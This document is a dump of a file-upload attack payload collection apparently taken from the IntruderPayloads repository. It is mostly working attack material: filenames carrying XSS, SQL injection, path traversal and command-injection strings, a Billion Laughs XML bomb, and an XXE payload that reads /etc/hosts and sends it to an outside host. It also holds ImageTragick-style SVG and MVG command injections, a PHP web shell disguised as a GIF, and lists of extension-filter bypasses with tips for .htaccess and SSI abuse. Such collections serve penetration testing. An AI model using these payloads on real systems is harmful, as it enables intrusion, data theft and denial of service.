https://raw.githubusercontent.com/1N3/IntruderPayloads/9b84328441e0b1d5b63764941bfd72a2460dba5d/Uploads/%00';alert(2);.jpg


--------------------------------------------------------------------------------
/Uploads/%001.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1N3/IntruderPayloads/9b84328441e0b1d5b63764941bfd72a2460dba5d/Uploads/%001.jpg


--------------------------------------------------------------------------------
/Uploads/%0011.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1N3/IntruderPayloads/9b84328441e0b1d5b63764941bfd72a2460dba5d/Uploads/%0011.jpg


--------------------------------------------------------------------------------
/Uploads/%0a';alert(1);.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1N3/IntruderPayloads/9b84328441e0b1d5b63764941bfd72a2460dba5d/Uploads/%0a';alert(1);.jpg


--------------------------------------------------------------------------------
/Uploads/%0a';alert(2);.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1N3/IntruderPayloads/9b84328441e0b1d5b63764941bfd72a2460dba5d/Uploads/%0a';alert(2);.jpg


--------------------------------------------------------------------------------
/Uploads/%0a1.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1N3/IntruderPayloads/9b84328441e0b1d5b63764941bfd72a2460dba5d/Uploads/%0a1.jpg


--------------------------------------------------------------------------------
/Uploads/%1.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1N3/IntruderPayloads/9b84328441e0b1d5b63764941bfd72a2460dba5d/Uploads/%1.jpg


--------------------------------------------------------------------------------
/Uploads/%22%3E%3Csvg%20onload%3Dalert(1)%3E%00.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1N3/IntruderPayloads/9b84328441e0b1d5b63764941bfd72a2460dba5d/Uploads/%22%3E%3Csvg%20onload%3Dalert(1)%3E%00.png


--------------------------------------------------------------------------------
/Uploads/%22%3E%3Csvg%20onload%3Dalert(1)%3E%0a%0f.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1N3/IntruderPayloads/9b84328441e0b1d5b63764941bfd72a2460dba5d/Uploads/%22%3E%3Csvg%20onload%3Dalert(1)%3E%0a%0f.png


--------------------------------------------------------------------------------
/Uploads/%22%3E%3Csvg%20onload%3Dalert(1)%3E%0a.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1N3/IntruderPayloads/9b84328441e0b1d5b63764941bfd72a2460dba5d/Uploads/%22%3E%3Csvg%20onload%3Dalert(1)%3E%0a.png


--------------------------------------------------------------------------------
/Uploads/%22%3E%3Csvg%20onload%3Dalert(1)%3E.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1N3/IntruderPayloads/9b84328441e0b1d5b63764941bfd72a2460dba5d/Uploads/%22%3E%3Csvg%20onload%3Dalert(1)%3E.png


--------------------------------------------------------------------------------
/Uploads/%22__img src=x onerror=prompt(1)_.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1N3/IntruderPayloads/9b84328441e0b1d5b63764941bfd72a2460dba5d/Uploads/%22__img src=x onerror=prompt(1)_.jpg


--------------------------------------------------------------------------------
/Uploads/%22onerror=%22alert(1)%22a=%22.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1N3/IntruderPayloads/9b84328441e0b1d5b63764941bfd72a2460dba5d/Uploads/%22onerror=%22alert(1)%22a=%22.jpg


--------------------------------------------------------------------------------
/Uploads/%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00%0d%0a\n;`whoami`'"--.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1N3/IntruderPayloads/9b84328441e0b1d5b63764941bfd72a2460dba5d/Uploads/%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00%0d%0a\n;`whoami`'"--.png


--------------------------------------------------------------------------------
/Uploads/' having 1=1:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1N3/IntruderPayloads/9b84328441e0b1d5b63764941bfd72a2460dba5d/Uploads/' having 1=1


--------------------------------------------------------------------------------
/Uploads/'" --:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1N3/IntruderPayloads/9b84328441e0b1d5b63764941bfd72a2460dba5d/Uploads/'" --


--------------------------------------------------------------------------------
/Uploads/'+alert(1)+'.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1N3/IntruderPayloads/9b84328441e0b1d5b63764941bfd72a2460dba5d/Uploads/'+alert(1)+'.jpg


--------------------------------------------------------------------------------
/Uploads/'.swf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1N3/IntruderPayloads/9b84328441e0b1d5b63764941bfd72a2460dba5d/Uploads/'.swf


--------------------------------------------------------------------------------
/Uploads/';alert(1);x='.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1N3/IntruderPayloads/9b84328441e0b1d5b63764941bfd72a2460dba5d/Uploads/';alert(1);x='.jpg


--------------------------------------------------------------------------------
/Uploads/.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1N3/IntruderPayloads/9b84328441e0b1d5b63764941bfd72a2460dba5d/Uploads/.zip


--------------------------------------------------------------------------------
/Uploads/1N3.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1N3/IntruderPayloads/9b84328441e0b1d5b63764941bfd72a2460dba5d/Uploads/1N3.jpg


--------------------------------------------------------------------------------
/Uploads/1N3.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1N3/IntruderPayloads/9b84328441e0b1d5b63764941bfd72a2460dba5d/Uploads/1N3.php


--------------------------------------------------------------------------------
/Uploads/1N3.php\x00.csv:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1N3/IntruderPayloads/9b84328441e0b1d5b63764941bfd72a2460dba5d/Uploads/1N3.php\x00.csv


--------------------------------------------------------------------------------
/Uploads/1N3.php\x00.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1N3/IntruderPayloads/9b84328441e0b1d5b63764941bfd72a2460dba5d/Uploads/1N3.php\x00.jpg


--------------------------------------------------------------------------------
/Uploads/<h1>INJECTX.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1N3/IntruderPayloads/9b84328441e0b1d5b63764941bfd72a2460dba5d/Uploads/<h1>INJECTX.jpg


--------------------------------------------------------------------------------
/Uploads/<hr>test<hr>:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1N3/IntruderPayloads/9b84328441e0b1d5b63764941bfd72a2460dba5d/Uploads/<hr>test<hr>


--------------------------------------------------------------------------------
/Uploads/<img:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1N3/IntruderPayloads/9b84328441e0b1d5b63764941bfd72a2460dba5d/Uploads/<img


--------------------------------------------------------------------------------
/Uploads/<img onload=prompt(1)>.csv:
--------------------------------------------------------------------------------
1 | test	test	test	<script>alert(1)</script>
2 | 


--------------------------------------------------------------------------------
/Uploads/<img src="c" onerror=alert(1)>:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1N3/IntruderPayloads/9b84328441e0b1d5b63764941bfd72a2460dba5d/Uploads/<img src="c" onerror=alert(1)>


--------------------------------------------------------------------------------
/Uploads/BillionLaughs.txt:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0"?>
 2 | <!DOCTYPE root [
 3 | <!ELEMENT root (#PCDATA)>
 4 | 	<!ENTITY ha1 "&ha0;&ha0;" >
 5 | 	<!ENTITY ha2 "&ha1;&ha1;" >
 6 | 	<!ENTITY ha3 "&ha2;&ha2;" >
 7 | 	<!ENTITY ha4 "&ha3;&ha3;" >
 8 | 	<!ENTITY ha5 "&ha4;&ha4;" >
 9 | 	<!ENTITY ha6 "&ha5;&ha5;" >
10 | 	<!ENTITY ha7 "&ha6;&ha6;" >
11 | 	<!ENTITY ha8 "&ha7;&ha7;" >
12 | 	<!ENTITY ha9 "&ha8;&ha8;" >
13 | 	<!ENTITY ha10 "&ha9;&ha9;" >
14 | 	<!ENTITY ha11 "&ha10;&ha10;" >
15 | 	<!ENTITY ha12 "&ha11;&ha11;" >
16 | 	<!ENTITY ha13 "&ha12;&ha12;" >
17 | 	<!ENTITY ha14 "&ha13;&ha13;" >
18 | 	<!ENTITY ha15 "&ha14;&ha14;" >
19 | 	<!ENTITY ha16 "&ha15;&ha15;" >
20 | 	<!ENTITY ha17 "&ha16;&ha16;" >
21 | 	<!ENTITY ha18 "&ha17;&ha17;" >
22 | 	<!ENTITY ha19 "&ha18;&ha18;" >
23 | 	<!ENTITY ha20 "&ha19;&ha19;" >
24 | 	<!ENTITY ha21 "&ha20;&ha20;" >
25 | 	<!ENTITY ha22 "&ha21;&ha21;" >
26 | 	<!ENTITY ha23 "&ha22;&ha22;" >
27 | 	<!ENTITY ha24 "&ha23;&ha23;" >
28 | 	<!ENTITY ha25 "&ha24;&ha24;" >
29 | 	<!ENTITY ha26 "&ha25;&ha25;" >
30 | 	<!ENTITY ha27 "&ha26;&ha26;" >
31 | 	<!ENTITY ha28 "&ha27;&ha27;" >
32 | 	<!ENTITY ha29 "&ha28;&ha28;" >
33 | 	<!ENTITY ha30 "&ha29;&ha29;" >
34 | ]>
35 | <root>&ha30;</root>


--------------------------------------------------------------------------------
/Uploads/Desktop.rar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1N3/IntruderPayloads/9b84328441e0b1d5b63764941bfd72a2460dba5d/Uploads/Desktop.rar


--------------------------------------------------------------------------------
/Uploads/EventsSources.xml:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="UTF-8" standalone="yes"?>
2 | <TipsContents xmlns="http://www.avendasys.com/tipsapiDefs/1.0">
3 |   <TipsHeader exportTime="Sat Jul 09 14:43:53 PDT 2016" version="6.6"/>
4 |   <EventsSources>
5 |     <EventsSource enable="true" vendor="CheckPoint" type="Syslog" ipaddress="127.0.0.1" description="INJECTX2" name="INJECTX1"/>
6 |   </EventsSources>
7 | </TipsContents>
8 | 


--------------------------------------------------------------------------------
/Uploads/Link to svg-xss-xml.svg:
--------------------------------------------------------------------------------
1 | /pentest/web_payloads/upload/svg-xss-xml.svg


--------------------------------------------------------------------------------
/Uploads/ProxyTarget.xml:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="UTF-8" standalone="yes"?>
2 | <TipsContents xmlns="http://www.avendasys.com/tipsapiDefs/1.0">
3 |   <TipsHeader exportTime="Sat Jul 09 15:07:17 PDT 2016" version="6.6"/>
4 |   <Proxies>
5 |     <Proxy description="injectx.crowdshield.com" name="injectx.crowdshield.com" secret="" acctPort="3000" authPort="3000" hostName="injectx.crowdshield.com"/>
6 |   </Proxies>
7 | </TipsContents>
8 | 


--------------------------------------------------------------------------------
/Uploads/Sun'><img src=x onerror=alert(1)>set.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1N3/IntruderPayloads/9b84328441e0b1d5b63764941bfd72a2460dba5d/Uploads/Sun'><img src=x onerror=alert(1)>set.jpg


--------------------------------------------------------------------------------
/Uploads/Sun'__img src=x onerror=alert(1)_set.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1N3/IntruderPayloads/9b84328441e0b1d5b63764941bfd72a2460dba5d/Uploads/Sun'__img src=x onerror=alert(1)_set.jpg


--------------------------------------------------------------------------------
/Uploads/\';alert\(XSS\);x=\':
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1N3/IntruderPayloads/9b84328441e0b1d5b63764941bfd72a2460dba5d/Uploads/\';alert\(XSS\);x=\'


--------------------------------------------------------------------------------
/Uploads/alt-extensions-asp.txt:
--------------------------------------------------------------------------------
 1 | asp
 2 | aspx
 3 | asa
 4 | aSP
 5 | aSpx
 6 | aSa
 7 | asp%20%20%20
 8 | aspx%20%20%20
 9 | asa%20%20%20
10 | aSP%20%20%20
11 | aSpx%20%20%20
12 | aSa%20%20%20
13 | asp......
14 | aspx......
15 | asa......
16 | aSP......
17 | aSpx......
18 | aSa......
19 | asp%20%20%20...%20.%20..
20 | aspx%20%20%20...%20.%20..
21 | asa%20%20%20...%20.%20..
22 | aSP%20%20%20...%20.%20..
23 | aSpx%20%20%20...%20.%20..
24 | aSa%20%20%20...%20.%20..
25 | asp%00
26 | aspx%00
27 | asa%00
28 | aSp%00
29 | aSpx%00
30 | aSa%00
31 | 


--------------------------------------------------------------------------------
/Uploads/alt-extensions-coldfusion.txt:
--------------------------------------------------------------------------------
 1 | cfm
 2 | cfml
 3 | cfc
 4 | dbm
 5 | cFm
 6 | cFml
 7 | cFc
 8 | dBm
 9 | cfm%20%20%20
10 | cfml%20%20%20
11 | cfc%20%20%20
12 | dbm%20%20%20
13 | cFm%20%20%20
14 | cFml%20%20%20
15 | cFc%20%20%20
16 | dBm%20%20%20
17 | cfm......
18 | cfml......
19 | cfc.......
20 | dbm......
21 | cFm......
22 | cFml......
23 | cFc......
24 | dBm......
25 | cfm%20%20%20...%20.%20..
26 | cfml%20%20%20...%20.%20..
27 | cfc%20%20%20...%20.%20..
28 | dbm%20%20%20...%20.%20..
29 | cFm%20%20%20...%20.%20..
30 | cFml%20%20%20...%20.%20..
31 | cFc%20%20%20...%20.%20..
32 | dBm%20%20%20...%20.%20..
33 | cfm%00
34 | cfml%00
35 | cfc%00
36 | dbm%00
37 | cFm%00
38 | cFml%00
39 | cFc%00
40 | dBm%00
41 | 


--------------------------------------------------------------------------------
/Uploads/alt-extensions-jsp.txt:
--------------------------------------------------------------------------------
 1 | jsp
 2 | jspx
 3 | jsw
 4 | jsv
 5 | jspf
 6 | jSp
 7 | jSpx
 8 | jSw
 9 | jSv
10 | jSpf
11 | jSp%00
12 | jSp%20%20%20
13 | jSp%20%20%20...%20.%20..a
14 | jSp......
15 | jSpf%00
16 | jSpf%20%20%20
17 | jSpf%20%20%20...%20.%20..a
18 | jSpf......
19 | jSpx%00
20 | jSpx%20%20%20
21 | jSpx%20%20%20...%20.%20..a
22 | jSpx......
23 | jSv%00
24 | jSv%20%20%20
25 | jSv%20%20%20...%20.%20..a
26 | jSv......
27 | jSw%00
28 | jSw%20%20%20
29 | jSw%20%20%20...%20.%20..a
30 | jSw......
31 | jsp%00
32 | jsp%20%20%20
33 | jsp%20%20%20...%20.%20..a
34 | jsp......
35 | jspf%00
36 | jspf%20%20%20
37 | jspf%20%20%20...%20.%20..a
38 | jspf......
39 | jspx%00
40 | jspx%20%20%20
41 | jspx%20%20%20...%20.%20..a
42 | jspx......
43 | jsv%00
44 | jsv%20%20%20
45 | jsv%20%20%20...%20.%20..a
46 | jsv......
47 | jsw%00
48 | jsw%20%20%20
49 | jsw%20%20%20...%20.%20..a
50 | jsw......
51 | 


--------------------------------------------------------------------------------
/Uploads/alt-extensions-perl.txt:
--------------------------------------------------------------------------------
 1 | # .pm .lib cannot be called directly, must be called as modules
 2 | pl
 3 | pm
 4 | cgi
 5 | pL
 6 | pM
 7 | cGi
 8 | lib
 9 | lIb
10 | cGi%00
11 | cGi%20%20%20
12 | cGi......
13 | cgi%00
14 | cgi%20%20%20
15 | cgi......
16 | lIb%00
17 | lIb%20%20%20
18 | lIb......
19 | lib%00
20 | lib%20%20%20
21 | lib......
22 | pL%00
23 | pL%20%20%20
24 | pL......
25 | pM%00
26 | pM%20%20%20
27 | pM......
28 | pl%00
29 | pl%20%20%20
30 | pl......
31 | pm%00
32 | pm%20%20%20
33 | pm......
34 | 


--------------------------------------------------------------------------------
/Uploads/alt-extensions-php.txt:
--------------------------------------------------------------------------------
 1 | phtml
 2 | php
 3 | php3
 4 | php4
 5 | php5
 6 | inc  
 7 | pHtml
 8 | pHp
 9 | pHp3
10 | pHp4
11 | pHp5
12 | iNc
13 | iNc%00
14 | iNc%20%20%20
15 | iNc%20%20%20...%20.%20..
16 | iNc......
17 | inc%00
18 | inc%20%20%20
19 | inc%20%20%20...%20.%20..
20 | inc......
21 | pHp%00
22 | pHp%20%20%20
23 | pHp%20%20%20...%20.%20..
24 | pHp......
25 | pHp3%00
26 | pHp3%20%20%20
27 | pHp3%20%20%20...%20.%20..
28 | pHp3......
29 | pHp4%00
30 | pHp4%20%20%20
31 | pHp4%20%20%20...%20.%20..
32 | pHp4......
33 | pHp5%00
34 | pHp5%20%20%20
35 | pHp5%20%20%20...%20.%20..
36 | pHp5......
37 | pHtml%00
38 | pHtml%20%20%20
39 | pHtml%20%20%20...%20.%20..
40 | pHtml......
41 | php%00
42 | php%20%20%20
43 | php%20%20%20...%20.%20..
44 | php......
45 | php3%00
46 | php3%20%20%20
47 | php3%20%20%20...%20.%20..
48 | php3......
49 | php4%00
50 | php4%20%20%20
51 | php4%20%20%20...%20.%20..
52 | php4......
53 | php5%00
54 | php5%20%20%20
55 | php5%20%20%20...%20.%20..
56 | php5......
57 | phtml%00
58 | phtml%20%20%20
59 | phtml%20%20%20...%20.%20..
60 | phtml......
61 | 


--------------------------------------------------------------------------------
/Uploads/download.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1N3/IntruderPayloads/9b84328441e0b1d5b63764941bfd72a2460dba5d/Uploads/download.gif


--------------------------------------------------------------------------------
/Uploads/evil-xxe.docx:
--------------------------------------------------------------------------------
1 | <!ENTITY % data SYSTEM "file:///etc/hosts"><!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://sn1persecurity.com/.testing/xxe_vuln.html?%data;'>">


--------------------------------------------------------------------------------
/Uploads/exifremover.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1N3/IntruderPayloads/9b84328441e0b1d5b63764941bfd72a2460dba5d/Uploads/exifremover.jpg


--------------------------------------------------------------------------------
/Uploads/exploit.jpg:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" standalone="no"?>
 2 | <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
 3 | "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd";>
 4 | <svg width="640px" height="480px" version="1.1"
 5 | xmlns="http://www.w3.org/2000/svg"; xmlns:xlink=
 6 | "http://www.w3.org/1999/xlink";>
 7 | <image xlink:href="https://crowdshield.com/.testing/xss.jpg&quot;|ls &quot;-la"
 8 | x="0" y="0" height="640px" width="480px"/>
 9 | </svg>
10 | 


--------------------------------------------------------------------------------
/Uploads/exploit.mvg:
--------------------------------------------------------------------------------
1 | push graphic-context
2 | viewbox 0 0 640 480
3 | fill 'url(https://crowdshield.com/.testing/xss.jpg";|ls "-la)'
4 | pop graphic-context
5 | 


--------------------------------------------------------------------------------
/Uploads/exploit.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1N3/IntruderPayloads/9b84328441e0b1d5b63764941bfd72a2460dba5d/Uploads/exploit.png


--------------------------------------------------------------------------------
/Uploads/exploit.svg:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" standalone="no"?>
 2 | <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
 3 | "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd";>
 4 | <svg width="640px" height="480px" version="1.1"
 5 | xmlns="http://www.w3.org/2000/svg"; xmlns:xlink=
 6 | "http://www.w3.org/1999/xlink";>
 7 | <image xlink:href="https://crowdshield.com/.testing/xss.jpg&quot;|ls &quot;-la"
 8 | x="0" y="0" height="640px" width="480px"/>
 9 | </svg>
10 | 


--------------------------------------------------------------------------------
/Uploads/file-ul-filter-bypass-commonly-writable-directories.txt:
--------------------------------------------------------------------------------
 1 | templates_compiled
 2 | templates_c
 3 | templates
 4 | temporary
 5 | images
 6 | cache
 7 | temp
 8 | files
 9 | tmp
10 | 


--------------------------------------------------------------------------------
/Uploads/file-ul-filter-bypass-microsoft-asp-filetype-bf.txt:
--------------------------------------------------------------------------------
 1 | # {ASPSCRIPT}gets regex replaced with the shell or other file you are trying to upload, {EXT} should be brute-forced with payloads from discovery/filename-bruteforce/file-extensions/, since some file upload types may be allowed that are not listed.
 2 | {ASPSCRIPT}
 3 | {ASPSCRIPT}.{EXT}
 4 | {ASPSCRIPT};
 5 | {ASPSCRIPT};.{EXT}
 6 | {ASPSCRIPT}%00
 7 | {ASPSCRIPT}%00.{EXT}
 8 | {ASPSCRIPT}::data%00.
 9 | {ASPSCRIPT}::data%00.{EXT}
10 | 


--------------------------------------------------------------------------------
/Uploads/file-ul-filter-bypass-microsoft-asp.txt:
--------------------------------------------------------------------------------
 1 | # this file contains a number of common predictable values. Add more if other file ttypes are allowed, or use the filetype-bf version of this fuzzfile
 2 | {ASPSCRIPT}
 3 | {ASPSCRIPT};
 4 | {ASPSCRIPT};.jpg
 5 | {ASPSCRIPT};.pdf
 6 | {ASPSCRIPT};.html
 7 | {ASPSCRIPT};.htm
 8 | {ASPSCRIPT};.txt
 9 | {ASPSCRIPT};.xyz
10 | {ASPSCRIPT};.zip
11 | {ASPSCRIPT};.tgz
12 | {ASPSCRIPT};.doc
13 | {ASPSCRIPT};.docx
14 | {ASPSCRIPT};.xls
15 | {ASPSCRIPT};.xlsx
16 | {ASPSCRIPT}%00.jpg
17 | {ASPSCRIPT}%00.pdf
18 | {ASPSCRIPT}%00.html
19 | {ASPSCRIPT}%00.txt
20 | {ASPSCRIPT}%00.xyz
21 | {ASPSCRIPT}%00.tgz
22 | {ASPSCRIPT}%00.zip
23 | {ASPSCRIPT}%00.doc
24 | {ASPSCRIPT}%00.docx
25 | {ASPSCRIPT}%00
26 | {ASPSCRIPT}::data%00.jpg
27 | {ASPSCRIPT}::data%00.pdf
28 | {ASPSCRIPT}::data%00.html
29 | {ASPSCRIPT}::data%00.txt
30 | {ASPSCRIPT}::data%00.zip
31 | {ASPSCRIPT}::data%00.doc
32 | {ASPSCRIPT}::data%00.xls
33 | {ASPSCRIPT}%00%20%20%20
34 | {ASPSCRIPT}%00%20%20%20...%20.%20..
35 | {ASPSCRIPT}%00......
36 | {ASPSCRIPT}%20%20%20
37 | {ASPSCRIPT}%20%20%20...%20.%20..
38 | {ASPSCRIPT}......
39 | {ASPSCRIPT}::data%00%%20%20%20
40 | {ASPSCRIPT}::data%00%%20%20%20...%20.%20..
41 | {ASPSCRIPT}::data%00%......
42 | {ASPSCRIPT}%00%20%20%20;.jpg
43 | {ASPSCRIPT}%00%20%20%20;.doc
44 | {ASPSCRIPT}%00%20%20%20...%20.%20..;.jpg
45 | {ASPSCRIPT}%00%20%20%20...%20.%20..;.doc
46 | {ASPSCRIPT}%00......;.jpg
47 | {ASPSCRIPT}%00......;.doc
48 | {ASPSCRIPT}%20%20%20;.jpg
49 | {ASPSCRIPT}%20%20%20;.doc
50 | {ASPSCRIPT}%20%20%20...%20.%20..;.jpg
51 | {ASPSCRIPT}%20%20%20...%20.%20..;.doc
52 | {ASPSCRIPT}......;.jpg
53 | {ASPSCRIPT}......;.doc
54 | {ASPSCRIPT}::data%00%%20%20%20;.jpg
55 | {ASPSCRIPT}::data%00%%20%20%20;.doc
56 | {ASPSCRIPT}::data%00%%20%20%20...%20.%20..;.jpg
57 | {ASPSCRIPT}::data%00%%20%20%20...%20.%20..;.doc
58 | {ASPSCRIPT}::data%00%......;.jpg
59 | {ASPSCRIPT}::data%00%......;.doc
60 | 


--------------------------------------------------------------------------------
/Uploads/file-ul-filter-bypass-ms-php.txt:
--------------------------------------------------------------------------------
 1 | # Another test: use exiftool http://www.sno.phy.queensu.ca/~phil/exiftool/  to create a .jpg image with the meta comment field set to:
 2 | # -----
 3 | #<?php phpinfo(); ?> 
 4 | #-----
 5 | {PHPSCRIPT}
 6 | {PHPSCRIPT}.phtml
 7 | {PHPSCRIPT}.php.html
 8 | {PHPSCRIPT}.php::$DATA
 9 | {PHPSCRIPT}.php.php.rar 
10 | {PHPSCRIPT}.php.rar 
11 | {PHPSCRIPT}::$DATA
12 | 


--------------------------------------------------------------------------------
/Uploads/file-ul-filter-bypass-x-platform-generic.txt:
--------------------------------------------------------------------------------
1 | %00index.html
2 | ;index.html
3 | %00  
4 | 


--------------------------------------------------------------------------------
/Uploads/file-ul-filter-bypass-x-platform-php.txt:
--------------------------------------------------------------------------------
 1 | # Another test: use exiftool http://www.sno.phy.queensu.ca/~phil/exiftool/  to create a .jpg image with the meta comment field set to:
 2 | # -----
 3 | # your own payload, or <?php phpinfo(); ?> 
 4 | #-----
 5 | {PHPSCRIPT}
 6 | {PHPSCRIPT}.phtml
 7 | {PHPSCRIPT}.php.html
 8 | {PHPSCRIPT}.php.php.rar 
 9 | {PHPSCRIPT}.php.rar 
10 | 


--------------------------------------------------------------------------------
/Uploads/file-ul-filter-bypass.readme:
--------------------------------------------------------------------------------
 1 | # File Upload Fuzzfile 1.0 - File Name Filter Bypass
 2 | # creative commons license http://creativecommons.org/licenses/by/3.0/
 3 | # see:
 4 | # http://cwe.mitre.org/data/definitions/434.html
 5 | 
 6 | # projurl
 7 | 
 8 | # For MIME filter bypass, your shellscript should look like
 9 | # -------
10 | # GIF89aP;
11 | # [shell]
12 | # -------
13 | #
14 | # Check to see if there are no extension checks at all
15 | #
16 | # Check to see if the file upload protection is client side only.
17 | #
18 | # For mod_cgi Server Side Include upload attacks:
19 | #<!--#exec cmd="ls" -->
20 | #
21 | #or, on Windows
22 | #
23 | #<!--#exec cmd="dir" -->
24 | #
25 | # Sometimes you can overwrite .htaccess in an upload folder on Apache httpd, if so, 
26 | # try setting .jpg to executable. If you can set the target directory, try fuzz the 
27 | # list of all dirs you've enumerated on the servers, and try the commonly writable directory fuzzfile.
28 | #
29 | # example .htaccess that sets mime type .jpg to be executable:
30 | # -----
31 | # AddType application/x-httpd-php .jpg
32 | # -----
33 | 


--------------------------------------------------------------------------------
/Uploads/gifshell.php.gif:
--------------------------------------------------------------------------------
 1 | GIF89a1
 2 | error_reporting(NULL)
 3 | $me=$_SERVER['PHP_SELF']
 4 | $NameF=$_REQUEST['NameF']
 5 | $nowaddress='<input type=hidden name=address value="'.getcwd().'">'
 6 | $pass_up="a13756bf1e2bd46921c135232774fc5f"
 7 | if (isset($_FILES["elif"]) and
 8 |  $_FILES["elif"]["error"] )
 9 | move_uploaded_file($_FILES["elif"]["tmp_name"], $_FILES["elif"]["name"])
10 | echo $ifupload=" ItsOk "
11 | if(md5($_REQUEST['ssp'])
12 | =$pass_up)
13 | print "<title>403 Forbidden</title><h1>Forbidden</h1><p>You don't have permission to access ".$_SERVER['PHP_SELF']." on this server </p>"
14 | exit()
15 |  $_SESSION['LoGiN']=true
16 | echo "<form action=$me method=post enctype=multipart/form-data> $nowaddress <input type=file name=elif ><input type=submit value=Upload /></form>"
17 | 


--------------------------------------------------------------------------------
/Uploads/hithere.php.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1N3/IntruderPayloads/9b84328441e0b1d5b63764941bfd72a2460dba5d/Uploads/hithere.php.jpg


--------------------------------------------------------------------------------
/Uploads/image%00.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1N3/IntruderPayloads/9b84328441e0b1d5b63764941bfd72a2460dba5d/Uploads/image%00.jpg


--------------------------------------------------------------------------------
/Uploads/image.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1N3/IntruderPayloads/9b84328441e0b1d5b63764941bfd72a2460dba5d/Uploads/image.jpg


--------------------------------------------------------------------------------
/Uploads/image.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1N3/IntruderPayloads/9b84328441e0b1d5b63764941bfd72a2460dba5d/Uploads/image.php


--------------------------------------------------------------------------------
/Uploads/image_upload_test.rar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1N3/IntruderPayloads/9b84328441e0b1d5b63764941bfd72a2460dba5d/Uploads/image_upload_test.rar


--------------------------------------------------------------------------------
/Uploads/import_csv_template.csv:
--------------------------------------------------------------------------------
1 | login,firstName,lastName,middleName,honorificPrefix,honorificSuffix,email,title,displayName,nickName,profileUrl,secondEmail,mobilePhone,primaryPhone,streetAddress,city,state,zipCode,countryCode,postalAddress,preferredLanguage,locale,timezone,userType,employeeNumber,costCenter,organization,division,department,managerId,manager,<img/onload=alert(1)>,phpinfo(),`whoami`,&uname&,|ls|ls,{{4+4}}
2 | 


--------------------------------------------------------------------------------
/Uploads/import_csv_template2.csv:
--------------------------------------------------------------------------------
1 | Message Name,“><svg/onload=alert(1)>
2 | Message Field,“><svg/onload=alert(1)>
3 | Base Label,“><svg/onload=alert(1)>
4 | Base Label Update Date,“><svg/onload=alert(1)>
5 | Translated Label,“><svg/onload=alert(1)>
6 | Translated Label Update Date,“><svg/onload=alert(1)>
7 | Language,“><svg/onload=alert(1)>
8 | 


--------------------------------------------------------------------------------
/Uploads/invalid-filenames-linux.txt:
--------------------------------------------------------------------------------
1 | # Invalid filenames - these can be used to attempt to cause an error condition during file upload bypass attempts which might reveal an absolute path. Useful if you're not sure where your files are landing.
2 | 
3 | 


--------------------------------------------------------------------------------
/Uploads/invalid-filenames-microsoft.txt:
--------------------------------------------------------------------------------
 1 | # Useful for causing error messages that contain an absolute drivepath, such as if you don't know where the file uploader puts files
 2 | # regex replace {EXT} with allowed extension type 
 3 | CON.{EXT}
 4 | PRN.{EXT}
 5 | AUX.{EXT}
 6 | CLOCK$.{EXT}
 7 | NUL.{EXT}
 8 | COM1.{EXT}
 9 | COM2.{EXT}
10 | COM3.{EXT}
11 | COM4.{EXT}
12 | COM5.{EXT}
13 | COM6.{EXT}
14 | COM7.{EXT}
15 | COM8.{EXT}
16 | COM9.{EXT}
17 | LPT1.{EXT}
18 | LPT2.{EXT}
19 | LPT3.{EXT}
20 | LPT4.{EXT}
21 | LPT5.{EXT}
22 | LPT6.{EXT}
23 | LPT7.{EXT}
24 | LPT8.{EXT}
